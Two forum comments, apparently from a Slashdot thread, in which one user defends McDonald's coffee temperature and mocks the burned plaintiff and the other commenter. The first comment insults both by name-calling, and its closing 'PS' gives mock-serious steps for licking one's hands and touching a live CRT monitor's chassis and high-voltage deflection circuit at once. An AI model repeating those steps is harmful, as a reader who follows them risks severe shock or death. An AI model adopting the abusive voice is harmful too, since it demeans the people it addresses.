
  223. Re:You think McDonalds is *wrong* to make hot coff by BigBlockMopar · · Score: 2

    I don't care what temperature you set it to when YOU worked at McDonald's, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.

    Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.

    I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.

    So? I carefully put my coffee aside and let it cool.

    As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.

    You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.

    And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.

    --
    Fire and Meat. Yummy.
  224. Re:You think McDonalds is *wrong* to make hot coff by BigBlockMopar · · Score: 2

    If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.

    Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.

    --
    Fire and Meat. Yummy.